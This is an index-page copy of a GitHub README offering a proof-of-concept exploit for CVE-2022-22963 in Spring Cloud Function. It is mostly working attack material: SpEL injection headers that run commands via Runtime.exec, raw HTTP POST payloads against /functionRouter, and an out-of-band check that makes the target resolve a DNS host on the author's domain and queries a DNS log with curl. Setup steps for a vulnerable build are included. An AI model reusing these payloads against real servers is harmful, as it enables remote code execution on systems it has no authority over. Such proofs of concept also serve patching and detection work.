Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/hktalent/spring-spel-0day-poc
spring-cloud / spring-cloud-function,spring.cloud.function.routing-expression,RCE,0day,0-day,POC,EXP,CVE-2022-22963
https://github.com/hktalent/spring-spel-0day-poc
0day cve-2022-22963 exp java poc rce spel spring spring-cloud-function
Last synced: 24 days ago
JSON representation
spring-cloud / spring-cloud-function,spring.cloud.function.routing-expression,RCE,0day,0-day,POC,EXP,CVE-2022-22963
- Host: GitHub
- URL: https://github.com/hktalent/spring-spel-0day-poc
- Owner: hktalent
- Created: 2022-03-26T01:40:04.000Z (over 2 years ago)
- Default Branch: main
- Last Pushed: 2023-03-05T12:41:19.000Z (almost 2 years ago)
- Last Synced: 2024-08-05T17:40:36.002Z (4 months ago)
- Topics: 0day, cve-2022-22963, exp, java, poc, rce, spel, spring, spring-cloud-function
- Homepage: https://51pwn.com
- Size: 16.6 KB
- Stars: 354
- Watchers: 11
- Forks: 83
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- Funding: .github/FUNDING.yml
Awesome Lists containing this project
- awesome-hacking-lists - hktalent/spring-spel-0day-poc - spring-cloud / spring-cloud-function,spring.cloud.function.routing-expression,RCE,0day,0-day,POC,EXP,CVE-2022-22963 (Others)
README
[![Tweet](https://img.shields.io/twitter/url/http/Hktalent3135773.svg?style=social)](https://twitter.com/intent/follow?screen_name=Hktalent3135773) [![Follow on Twitter](https://img.shields.io/twitter/follow/Hktalent3135773.svg?style=social&label=Follow)](https://twitter.com/intent/follow?screen_name=Hktalent3135773) [![GitHub Followers](https://img.shields.io/github/followers/hktalent.svg?style=social&label=Follow)](https://github.com/hktalent/)
[![Top Langs](https://profile-counter.glitch.me/hktalent/count.svg)](https://51pwn.com)# spring-spel-0day-poc
spring-cloud/spring-cloud-function RCE EXP POC
https://github.com/spring-cloud/spring-cloud-function
header
```
spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -a calculator.app")
```
# build
```bash
wget https://github.com/spring-cloud/spring-cloud-function/archive/refs/tags/v3.1.6.zip
unzip v3.1.6.zip
cd spring-cloud-function-3.1.6
cd spring-cloud-function-samples/function-sample-pojo
mvn package
java -jar ./target/function-sample-pojo-2.0.0.RELEASE.jar
```# get path lists for test
```bash
find . -name "*.java"|xargs -I % cat %|grep -Eo '"([^" \.\/=>\|,:\}\+\)'"'"']{8,})"'|sort -u|sed 's/"//g'
```
```
...
functionRouter
uppercase
lowercase
...
```# poc1
```
POST /functionRouter HTTP/1.1
host:127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
Connection: close
spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -a /System/Applications/Calculator.app")
Content-Length: 551pwn
```# poc2
```
POST /functionRouter HTTP/1.1
host:127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
Connection: close
spring.cloud.function.routing-expression:T(java.net.InetAddress).getByName("random87535.rce.51pwn.com")
Content-Length: 551pwn
```## check
```bash
curl -v -H "user-agent: Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0" 'https://51pwn.com/dnslog?q=random87535.rce.51pwn.com'
```# Donation
| Wechat Pay | AliPay | Paypal | BTC Pay |BCH Pay |
| --- | --- | --- | --- | --- |
|||[paypal](https://www.paypal.me/pwned2019) **[email protected]**|||